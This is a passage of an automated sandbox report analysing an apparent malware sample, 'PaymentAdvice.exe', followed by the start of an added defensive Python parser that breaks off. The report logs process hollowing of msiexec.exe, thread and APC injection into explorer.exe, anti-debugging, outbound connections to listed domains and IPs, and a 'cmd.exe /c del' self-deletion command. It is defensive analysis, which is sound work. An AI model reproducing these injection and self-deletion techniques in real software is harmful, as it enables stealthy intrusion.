          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A08794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04673D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04657D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04668E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04678EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04634F2E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466A70E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0465F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046CFF10 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0470070D mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046737F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04648794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046B7794 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04701074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046F2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04650050 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466002D mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0464B02A mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04704015 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046B7016 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046CB8D0 mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466F0BF mov ecx, dword ptr fs:[00000030h] (x1); mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04639080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046B3884 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0463C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0463B171 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0465B944 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04654120 mov eax, dword ptr fs:[00000030h] (x4); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466513A mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04639100 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0463B1E1 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046C41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046661A0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046B69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046B51BE mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0466A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0465C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04662990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046EB260 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04708A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0467927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04639240 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046FEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046C4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04674A2C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04648A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04635210 mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0463AA16 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04653A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046FAA16 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04662AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_04662ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_046352A5 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.plataformaporelmarcanario.com
Source: C:\Windows\explorer.exe | Domain query: www.unmanglement.com
Source: C:\Windows\explorer.exe | Network Connect: 108.167.140.96 80
Source: C:\Windows\explorer.exe | Network Connect: 66.96.162.131 80
Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe | Domain query: www.hispanicalinguablog.com
Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe | Domain query: www.webinast.com
Source: C:\Windows\explorer.exe | Network Connect: 35.214.93.182 80
Source: C:\Windows\explorer.exe | Network Connect: 81.19.159.73 80
Source: C:\Windows\explorer.exe | Network Connect: 52.142.208.184 80
Source: C:\Windows\explorer.exe | Domain query: www.sgdivergence.com
Source: C:\Windows\explorer.exe | Network Connect: 75.126.101.233 80
Source: C:\Windows\explorer.exe | Network Connect: 104.21.85.234 80
Source: C:\Windows\explorer.exe | Domain query: www.saturnkorp.net
Source: C:\Windows\explorer.exe | Domain query: www.puebloregentseniorliving.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.abolishlawinforcement.com
Source: C:\Windows\explorer.exe | Domain query: www.dajiangzhibo12.com
Source: C:\Windows\explorer.exe | Domain query: www.brandschutzglas.com
Source: C:\Windows\explorer.exe | Domain query: www.anchor-little.com

Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,GetMessageA,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Section loaded: unknown target: C:\Users\user\Desktop\PaymentAdvice.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 3472

Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B00000
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Process created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
Source: explorer.exe, 00000003.00000000.264311845.00000000089FF000.00000004.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000000.246528467.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
(Shell_TrayWnd and Progman are the window class names of the taskbar and the desktop window; looking them up with FindWindow/GetWindowThreadProcessId is the common way for an injector to locate the PID of explorer.exe.)
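Turning the evidence lines above into something actionable, as an added example that is not part of the Joe Sandbox report: a small Python parser for the report's "Source: <process><event>: <detail>" lines (the REPORT_LINES below are copied verbatim from this section, fused process/event text included) that rebuilds the injection chain, lists what the injected explorer.exe resolved and connected to, and flags the "cmd.exe /c del" self-deletion of the original sample. The subset of lines, the regexes and the rule logic are my choices; the three rules mirror the three observations the signatures make (a binary under C:\Windows talking to the network, cross-process thread/APC/section events, deletion of a path that earlier acted as a process).

```python
import json
import re
from collections import defaultdict

# Evidence lines copied from the signature section of this report. Joe Sandbox's
# text export fuses the source process path and the event name
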